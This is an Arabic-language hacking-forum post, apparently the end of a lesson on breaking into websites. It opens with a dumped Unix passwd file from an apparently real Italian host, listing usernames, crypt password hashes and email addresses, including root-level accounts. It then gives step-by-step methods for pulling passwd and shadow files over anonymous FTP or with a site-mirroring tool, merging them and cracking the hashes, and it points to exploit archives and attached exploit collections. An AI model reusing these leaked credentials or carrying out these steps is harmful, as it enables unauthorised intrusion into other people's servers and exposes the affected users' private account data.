uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:hi9LHn9wAMuKM:11:0:operator:/root:/bin/ba sh
games:*:12:100:games:/usr/games:
man:*:13:15

/usr/man:
postmaster:IMdMCC/PIFWzc:14:12:postmaster:/var/spo ol/mail:/bin/bash
irc:Vy9W3wR5zPvrQ:15

irc:/usr/lib/ircd:/bin/ba sh
nobody:*:65534:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
b24:LbscTfYVUy81I:525

b24@b24.it:/home/b24:/bi n/false
invito:q.aJnKrFH6.aY:528:100:invito@b24.it:/home/i nvito:/bin/false
staff:LGXIAedS2RmIk:501

staff@b24.it:/home/sta ff:/bin/false
boss:Mbbo7dN4pGxFQ:502

boss@b24.it:/home/boss:/ bin/false
ftplouis:Bp/c7BBP5cdTk:504:100::/home/ftplouis:/et c/ftponly
sonia:BoIUGVQzTExI2:506

sonia@b24.it:/home/son ia:/bin/false
free:7Jf.EThSyN51Q:515:100::/home/free:/etc/ftponl y
hyper:EljypR****1UE:516:100::/home/operator:/etc/f tponly
anxi:Kjt/tCc5tJTPg:517:100:anxi@b24.it:/home/anxi:/ bin/false
circus:/llfNsAKVi0Ho:518:100:circus@b24.it:/home/c ircus:/bin/false
giusy:IhuGRv2sWZKaw:519

giusy@b24.it:/home/giu sy:/bin/false
DREAMER:Ofba1Lu3JU7ME:520

:/home/DREAMER:/etc/ ftponly
mailb24:AbjsZjzU6Ddfg:521

:/home/mailb24:/etc/ ftponly
bannerx:fJ1HiOQTM9AsM:522

:/home/bannerx:/etc/ ftponly
celeb:MHv9S627d3AvQ:523

:/home/celeb:/etc/ftpo nly
circux:iy9PiZtaIu1tY:524

:/home/circux:/etc/ft ponly
celebs:KokcaSitL297Q:527

celeb@b24.it:/home/ce lebs:/bin/false
mailbx:NhU3ffPS57U3I:529

mailbx@b24.it:/home/m ailbx:/bin/false
freemail:OjDvcDLgmJaxk:533

:/home/freemail:/bi n/false
susannai:NobMV5y.xRahI:535:100:susannai@b24.it:/ho me/susannai:/bin/false
mb24:Dpvvinrt/7T7Y:536:100:mb24@b24.it:/home/mb24:/ bin/false
curry:HcyL0rXTzpsKY:551

accesso
curryguide:/home/operator/cgi-bin/cgsearch:/etc/ftponly
giovanni:BgAr/0x0ESQ9.:567:100::/home/giovanni:/et c/ftponly
SR:Gp.PqBfzDVUQs:608:100:SR@b24.it:/home/SR:/bin/f alse
carlo:KeYOOUSqNEArA:637

ftp carlo caffarelli:/home/carlo:/etc/ftponly
mysql:DaaSctmIvh/a6:638:100:account MYSQL:/home/mysql:/bin/bash
300cv:50oU2TLmwbxuw:550

300cv.b24.it:/home/300 cv:/etc/ftponly
directory:J2SohJZnZIltY:609

directory.b24.it:/ home/directory:/etc/ftponly
oroscopo:Ppx.Pyzq5qX/I:640:100:ate:/home/operator/ news/oroscopo/update:/etc/ftponly
cartoline:0eUtaIfbLngP.:503:100::/home/cartoline:/ etc/ftponly
Administrator:AzBIh5FS42Pcc:0:0:System Administrator:/:noshell
root3:SSpbaftOt8rE6:0:0::0:0:Charlie&:/root3:/bin/ athena/tcsh

************************************************** **********************

حبيت اقول قبل انتهي من الدرس ان بعض الثغرات تنفذ عن طريق المتصفح
وبعضها عن طريق برنامج مكتوب بالسي او البيرل

قبل اقولكم باي عندي لكم طريقتين سهلات مره وتنفع مع بعض السيرفرات

1- افتح اي برنامج FTP وادخل الموقع باليوزر هذا Anonymous والباسوورد يكون اي
ايميل ماهو شرط ايميلك وبعدين خذلك فرّه في الموقع عن طريق الإف تي بي لين تحصل
ملف الباسوورد والشادو وخلاص ادمجها ثم فك التشفير .... وبس

2- نزل عندك اي برنامج من اللي يحمل الموقع كامل مثل webzip نزل الموقع كامل
على جهازك بعد مايكتمل تنزيل الموقع احذفه <<<< امزح معكم
اضغط هنا لتحميل برنامج webzip ([ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط])
اذا اكتمل على جهازك دور في مجلداته وبتحصل ملف الباسوورد والشادو ادمجهم وفك تشفيرهم
<<< فك التشفير ورانا ورانا

هالطريقتين ممكن تكون نادره لكن تزبط مع بعض المواقع .

ألحين انتهينا من الموقع وعرفنا كل شي عنه اليوزر والباسوورد ماباقي شي
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] <<<< ويصعب علي اترك هذا في حاله Smile

باقي اقولكم اني مرفق مع الدرس ست ملفات
الأول لثغرات اليونكس
والثاني لثغرات اليونيكود
والثالث لثغرات السي جي آي
والرابع منوع فيه أكثر من ست آلاف ثغره
والخامس ثغرات ويندوز NT
والسادس الدرس هذا اذا حبيت تحفظه عندك

حمل الدرس من هنا ([ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]) <<<< اضغط بالزر الأيمن واختر حفظ الهدف بإسم

==========================
مواقع تهمك

أرشيف للثغرات
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
أرشيف للثغرات
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ويوفر لك معلومات الموقع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
أرشيف ثغرات + الكثير
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
يوفر لك مسجل الأرقام الأمريكي
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
أرشيف ثغرات
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
أرشيف ثغرات
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
مواقع لثغرات
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
كتب هاكرز
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
دليل لمواقع الهاكينق
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
مواقع تهمك
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

==========
أتمنى انكم طلعتوا بنتيجه
(جميع الحقوق محفوظة لــ طوفان ....

أخوكم M A T R I X موضوووع مهم جدا جدا في إختراق المواقع من أخوكم M A T R I X Icon_rr

» اختراق المواقع المجانية
» برامج هاكر المواقع
» إختراق مواقع الـ indexu
» فهرس دروس المسلوب العربي (منتدى تطوير المواقع)
» دورةإحتراف إختراق الشبكات أللاسلكية~~~ ألدرس ألاول